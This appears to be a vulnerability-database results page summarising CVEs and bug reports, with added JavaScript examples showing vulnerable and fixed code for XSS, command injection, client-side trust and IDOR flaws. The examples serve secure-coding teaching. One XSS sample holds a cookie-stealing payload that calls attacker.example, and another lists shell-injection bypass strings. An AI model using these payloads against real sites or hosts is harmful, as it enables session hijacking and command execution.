157 matches found

Prion · added 2024/01/16 10:15 p.m. · 31 views

Buffer overflow

Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE component: Scripting. Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition:...

CVSS 2.6 · AI score 6.5 · EPSS 0.01026
Exploits: 0 · References: 3 · Affected software: 5

CNVD · added 2023/09/08 12:00 a.m. · 7 views

Fortinet FortiSwitchManager Improper Access Control Vulnerability

Fortinet FortiSwitchManager is a network switch management tool from Fortinet designed to help organizations manage their FortiSwitch family of network switches. An improper access control vulnerability exists in Fortinet FortiSwitchManager. The vulnerability is caused by a flawed authentication...

CVSS 7.1 · AI score 6.8 · EPSS 0.00382
Exploits: 0 · References: 1

Hacker One · added 2023/08/27 1:22 a.m. · 53 views

inDrive: Unlimited fake rate to the passenger in city to city, Affected endpoint `/api/v1/reviews/ride/<ID>/driver`

The vulnerability allowed an unlimited increase of the passenger's rating in the city-to-city shared ride feature. The request to the /api/v1/reviews/ride/<ID>/driver endpoint was manipulated by changing the rating value to a higher number, which was accepted by the application and resulted in an...

AI score 7
Exploits: 0

Prion · added 2023/08/02 1:15 p.m. · 18 views

Code injection

The "upsell" widget for the portal allows specifying a product description. This description, taken from a user-controllable jslob, was not escaped before being added to the DOM. Malicious script code can be executed within the victim's context. This can lead to session hijacking or triggering...

CVSS 4.9 · AI score 5.6 · EPSS 0.00558
Exploits: 0 · References: 4 · Affected software: 1

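The entry above describes the classic stored DOM XSS pattern: a string from a user-controlled setting is inserted into the page as markup instead of as text. The block below is an added example, not Open-Xchange code; the widget, field names and the sample payload are hypothetical. It shows the vulnerable string-building shape beside two hardened forms: escaping before concatenation, and building DOM nodes with textContent so the HTML parser never sees the value.

```javascript
// Added example, not Open-Xchange code. Widget name, field names and the
// sample payload are hypothetical.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape for HTML text content and double-quoted attribute values.
// A single regex pass with a callback, so '&' is never double-escaped.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the untrusted description is concatenated into markup
// that the page later assigns to innerHTML, so any tags it contains are parsed.
function renderUpsellVulnerable(product) {
  return `<div class="upsell"><h3>${product.name}</h3><p>${product.description}</p></div>`;
}

// Hardened pattern: every untrusted value goes through escapeHtml before it
// reaches the markup string.
function renderUpsellEscaped(product) {
  return `<div class="upsell"><h3>${escapeHtml(product.name)}</h3><p>${escapeHtml(product.description)}</p></div>`;
}

// Preferred in the browser: build nodes and set textContent, which creates a
// text node and never invokes the HTML parser. `doc` is the DOM document.
function renderUpsellDom(doc, product) {
  const box = doc.createElement('div');
  box.className = 'upsell';
  const title = doc.createElement('h3');
  title.textContent = product.name;
  const body = doc.createElement('p');
  body.textContent = product.description;
  box.append(title, body);
  return box;
}

// Constructed payload: what a stored, attacker-controlled description might be.
const SAMPLE_PRODUCT = {
  name: 'Premium mailbox',
  description: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
};

// True if the rendered string still contains a parseable tag from the payload.
function containsLiveTag(html) {
  return /<img\b/i.test(html);
}
```

Escaping at render time is the minimum; the textContent form is the one to prefer in widget code, because it cannot regress when someone later adds a field and forgets the escape call.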
Prion · added 2023/06/19 5:15 p.m. · 22 views

Design/Logic Flaw

Vulnerability of system restart triggered by abnormal callbacks passed to APIs. Successful exploitation of this vulnerability may cause the system to restart...

CVSS 5 · AI score 7.5 · EPSS 0.00434
Exploits: 0 · References: 1 · Affected software: 1

Vulnrichment · added 2023/06/19 12:00 a.m. · 10 views

CVE-2023-34166

Vulnerability of system restart triggered by abnormal callbacks passed to APIs. Successful exploitation of this vulnerability may cause the system to restart...

AI score 6.8 · EPSS 0.00434
Exploits: 0 · References: 1

Vulnrichment · added 2023/05/03 6:33 p.m. · 9 views

CVE-2023-25826 Remote Code Execution in OpenTSDB

Due to insufficient validation of parameters passed to the legacy HTTP query API, it is possible to inject crafted OS commands into multiple parameters and execute malicious code on the OpenTSDB host system. This exploit exists due to an incomplete fix that was made when this vulnerability was...

CVSS 9.8 · AI score 9.7 · EPSS 0.35604
Exploits: 4 · References: 3

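The entry above notes that the OS command injection survived an incomplete fix. The block below is an added example and is not OpenTSDB code (OpenTSDB is a Java project; this is a Node illustration of the bug class). It contrasts a blocklist "cleaning" step of the kind that leaves other shell operators open with an allowlist validator plus execFile, which passes arguments as an argv array that no shell parses. The helper binary, flag names and identifier grammar are assumptions.

```javascript
// Added example, not OpenTSDB code. The helper binary, flag names and the
// identifier/timestamp grammar below are hypothetical.

// Incomplete fix: strip a handful of shell metacharacters from the parameter
// before it is spliced into a shell command line. Other operators, command
// substitution and newlines still reach the shell.
function stripSomeMetachars(input) {
  return String(input).replace(/[;&]/g, '');
}

// Constructed payloads that the blocklist above leaves intact.
const BYPASS_PAYLOADS = ['sys.cpu|id', 'sys.cpu$(id)', 'sys.cpu`id`', 'sys.cpu\nid'];

// True if the "cleaned" value still carries a shell operator.
function survivesBlocklist(payload) {
  return /[|$`\n]/.test(stripSomeMetachars(payload));
}

// Allowlist: a metric or tag identifier may only contain these characters.
// Anything else is rejected outright instead of being "cleaned".
const IDENTIFIER = /^[A-Za-z0-9_.\-/:]{1,255}$/;
function validateIdentifier(input) {
  if (typeof input !== 'string' || !IDENTIFIER.test(input)) {
    throw new Error(`invalid identifier: ${JSON.stringify(input)}`);
  }
  return input;
}

// Absolute epoch (seconds or milliseconds) or a relative form such as "1h-ago".
const TIMESTAMP = /^(?:\d{1,13}|\d{1,6}(?:ms|[smhdwny])-ago)$/;
function validateTimestamp(input) {
  if (typeof input !== 'string' || !TIMESTAMP.test(input)) {
    throw new Error(`invalid timestamp: ${JSON.stringify(input)}`);
  }
  return input;
}

// Build argv for the helper. Each parameter is validated, and the array is
// handed to execFile, so no shell ever parses it.
function buildArgv(metric, start) {
  return ['query', '--metric', validateIdentifier(metric), '--start', validateTimestamp(start)];
}

function runQuery(metric, start, callback) {
  const { execFile } = require('node:child_process');
  // shell: false is execFile's default; stated explicitly because enabling it
  // would reintroduce shell parsing of the arguments.
  execFile('/usr/local/bin/tsdb-helper', buildArgv(metric, start), { shell: false }, callback);
}
```

The test in the blocklist case is the one a reviewer should run against any "sanitize then exec" fix: if a payload with `|`, `$( )`, a backtick or a newline still reaches the shell, the fix is incomplete regardless of how many characters it strips.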
UbuntuCve · added 2023/04/18 8:15 p.m. · 30 views

CVE-2023-21954

Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE component: Hotspot. Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit...

CVSS 5.9 · AI score 6.8 · EPSS 0.01421
Exploits: 0 · References: 3

Prion · added 2023/04/18 8:15 p.m. · 25 views

Design/Logic Flaw

Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE component: JSSE. Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit...

CVSS 2.6 · AI score 5.9 · EPSS 0.01523
Exploits: 0 · References: 6 · Affected software: 5

Positive Technologies · added 2023/04/17 12:00 a.m. · 5 views

PT-2023-8788 · Haproxy +4

Name of the Vulnerable Software and Affected Versions: Roxy-WI version 6.3.9.0 Description: A Path Traversal issue was found in Roxy-WI, a web interface for managing Haproxy, Nginx, Apache, and Keepalived servers. This issue can be exploited via an HTTP request to "/app/options.py" and the config...

CVSS 6.8 · AI score 6.3 · EPSS 0.00902
Exploits: 1 · References: 7

Rapid7 Blog · added 2023/04/11 1:00 p.m. · 10 views

Raptor Technologies Volunteer Management Client-Side Security Controls (FIXED)

Prior to Mar 18, 2023, due to a reliance on client-side controls, authorized users of Raptor Technologies Volunteer Management SaaS products could effectively enumerate authorized users, and could modify restricted and unrestricted fields in the accounts of other users associated with the same...

AI score 6.1
Exploits: 0

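The Raptor entry above and the inDrive entry earlier on this page share one root cause: the server accepted whatever the client sent, whether an out-of-range rating value or a write to a restricted account field. The block below is an added example and is not inDrive or Raptor Technologies code. It shows two hypothetical handlers enforcing on the server what both entries describe as left to the client: a rating field that is range-checked and bound to one review per ride, and an account update that may only touch fields the caller's role allows. Field names, roles and the in-memory stores are assumptions.

```javascript
// Added example, not inDrive or Raptor Technologies code. Field names, roles
// and the in-memory stores are hypothetical.

const RATING_MIN = 1;
const RATING_MAX = 5;

// Reject anything that is not an integer inside the documented range; a
// client-supplied 100 or 1e9 must fail here, not be stored.
function validateRating(payload) {
  const rating = payload && payload.rating;
  if (!Number.isInteger(rating) || rating < RATING_MIN || rating > RATING_MAX) {
    throw new RangeError(`rating must be an integer in [${RATING_MIN}, ${RATING_MAX}]`);
  }
  return rating;
}

// store: Map keyed by ride id. Only the ride's own passenger may review the
// driver, and only once; replaying the request cannot inflate anything.
function submitDriverReview(store, actor, ride, payload) {
  if (ride.passengerId !== actor.id) throw new Error('forbidden: not a participant of this ride');
  if (store.has(ride.id)) throw new Error('conflict: ride already reviewed');
  const rating = validateRating(payload);
  store.set(ride.id, { reviewerId: actor.id, rating });
  return rating;
}

// Per-role allowlist of writable account fields. Unknown or restricted keys
// are a hard error rather than being silently merged (no mass assignment).
const WRITABLE_FIELDS = {
  self: ['displayName', 'phone'],
  admin: ['displayName', 'phone', 'role', 'backgroundCheckStatus'],
};

function applyAccountUpdate(account, actor, payload) {
  const role = actor.id === account.id ? 'self' : actor.isAdmin ? 'admin' : null;
  if (role === null) throw new Error("forbidden: cannot modify another user's account");
  const allowed = WRITABLE_FIELDS[role];
  const rejected = Object.keys(payload).filter((key) => !allowed.includes(key));
  if (rejected.length > 0) throw new Error(`forbidden: restricted fields ${rejected.join(', ')}`);
  return { ...account, ...payload };
}

// Returns the error message a call produces, or null if it succeeds.
function errorOf(fn) {
  try { fn(); return null; } catch (e) { return e.message; }
}

// Constructed sample data.
const SAMPLE_RIDE = { id: 'ride-42', passengerId: 'p1', driverId: 'd7' };
const SAMPLE_ACCOUNT = {
  id: 'u1', displayName: 'Sam', phone: '555-0100', role: 'volunteer', backgroundCheckStatus: 'pending',
};
```

The point of the per-role allowlist is that a client which hides a field in its UI gains nothing: the server decides which keys exist for this caller, and rejects the request rather than quietly ignoring the extra keys, so tampering is visible in logs.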
Positive Technologies · added 2023/03/04 12:00 a.m. · 3 views

PT-2023-8748

Name of the Vulnerable Software and Affected Versions: JetBrains TeamCity versions prior to 2023.11.4. Description: JetBrains TeamCity contains an authentication bypass issue due to an alternative path vulnerability. Successful exploitation allows an unauthenticated attacker to perform any action,...

CVSS 10 · AI score 8.1 · EPSS 0.99991
Exploits: 25 · References: 231

Vulnrichment · added 2023/02/09 12:00 a.m. · 10 views

CVE-2022-48301

The bundle management module lacks permission verification in some APIs. Successful exploitation of this vulnerability may restore the pre-installed apps that have been uninstalled...

AI score 7.2 · EPSS 0.00327
Exploits: 0 · References: 2

Vulnrichment · added 2023/01/13 6:03 p.m. · 6 views

CVE-2023-22489 Flarum is missing authorization in discussion replies

Flarum is a discussion platform for websites. If the first post of a discussion is permanently deleted but the discussion stays visible, any actor who can view the discussion is able to create a new reply via the REST API, no matter the reply permission or lock status. This includes users that...

CVSS 3.5 · AI score 4.1 · EPSS 0.00555
Exploits: 0 · References: 3

Huntr · added 2022/12/26 7:36 a.m. · 24 views

Get all file in resource of any user and Delete any file of any user via IDOR

Description: Easily GET information on all files uploaded by all users in Resources via the API https://demo.usememos.com/api/resource/$idresource (method GET). Easily DELETE all files uploaded by all users in Resources via the API https://demo.usememos.com/api/resource/$idresource (method DELETE). Proof of...

CVSS 6.5 · AI score 0.6 · EPSS 0.00811
Exploits: 1

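The memos entry above and the Flarum entry before it are both missing object-level authorization: the memos API looked a resource up by id and served or deleted it without checking whose it was, and Flarum let anyone who could view a discussion reply to it once its first post was gone, regardless of lock status or permission. The block below is an added example and is not Flarum or memos code. It shows a resource handler that verifies ownership for every method, and a reply check derived from the discussion's own state rather than from whether its first post still exists; the data model, the role names and the "buggy" branch are assumptions used to illustrate the bug class, not a reconstruction of either project's code.

```javascript
// Added example, not Flarum or memos code. Data model, permission names and
// the buggy branch are hypothetical.

// Constructed resource table; in a real service this is a database lookup.
const RESOURCES = new Map([
  [101, { id: 101, ownerId: 'alice', filename: 'notes.pdf' }],
  [102, { id: 102, ownerId: 'bob', filename: 'photo.jpg' }],
]);

// Vulnerable shape: look the object up by id and act on it for whoever asks.
function handleResourceVulnerable(store, method, id) {
  const resource = store.get(id);
  if (!resource) return { status: 404 };
  if (method === 'DELETE') { store.delete(id); return { status: 204 }; }
  return { status: 200, body: resource };
}

// Hardened shape: the same lookup, but the caller must own the object (or hold
// an explicit admin capability) before either reading or deleting it.
// Returning 404 rather than 403 avoids confirming that other users' ids exist.
function handleResource(store, method, id, actor) {
  const resource = store.get(id);
  if (!resource) return { status: 404 };
  if (resource.ownerId !== actor.id && !actor.isAdmin) return { status: 404 };
  if (method === 'DELETE') { store.delete(id); return { status: 204 }; }
  return { status: 200, body: resource };
}

// Reply permission. A check that short-circuits on the first post (the
// hypothetical buggy branch) ignores lock status and permission once that
// post is gone; the hardened check consults only the discussion and the actor.
function canReplyBuggy(discussion, actor) {
  if (discussion.firstPost === null) return true;
  return !discussion.isLocked && actor.permissions.includes('discussion.reply');
}

function canReply(discussion, actor) {
  if (!actor.permissions.includes('discussion.reply')) return false;
  if (discussion.isLocked && !actor.permissions.includes('discussion.replyLocked')) return false;
  return true;
}

// Constructed discussion whose first post was permanently deleted and which
// has since been locked.
const LOCKED_DISCUSSION_NO_FIRST_POST = { id: 7, isLocked: true, firstPost: null };
```

The ownership check belongs on every verb that touches the object, not only on DELETE; the memos report lists GET and DELETE because the same missing check exposed both. For the reply case, deriving permission from data that can be deleted (the first post) is what makes the check evaporate; anchor it to the discussion and the actor instead.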
Positive Technologies · added 2022/11/25 12:00 a.m. · 6 views

PT-2023-2665

Name of the Vulnerable Software and Affected Versions: Oracle Java SE versions 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition versions 20.3.9, 21.3.5, 22.3.1. Description: The issue allows an unauthenticated attacker with network access via multiple protocols to compromise...

CVSS 3.7 · AI score 6.7 · EPSS 0.01036
Exploits: 0 · References: 362

Vulnrichment · added 2022/10/25 4:34 p.m. · 7 views

CVE-2022-35268

A denial of service vulnerability exists in the webserver hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability. This denial of service is in the...

CVSS 4.9 · AI score 7.3 · EPSS 0.00904
Exploits: 1 · References: 1

Vulnrichment · added 2022/10/25 4:34 p.m. · 8 views

CVE-2022-35264

A denial of service vulnerability exists in the webserver hashFirst functionality of Robustel R1510 3.1.16 and 3.3.0. A specially-crafted network request can lead to denial of service. An attacker can send a sequence of requests to trigger this vulnerability. This denial of service is in the...

CVSS 4.9 · AI score 5.7 · EPSS 0.00904
Exploits: 1 · References: 1

RedhatCVE · added 2022/10/19 9:47 a.m. · 46 views

CVE-2022-21624

Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE component: JNDI. Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit...

CVSS 3.7 · AI score 2.3 · EPSS 0.01401
Exploits: 0 · References: 3

RedhatCVE · added 2022/04/20 8:47 a.m. · 69 views

CVE-2022-21496

Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE component: JNDI. Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable...

CVSS 5.3 · AI score 2.2 · EPSS 0.02651
Exploits: 0 · References: 3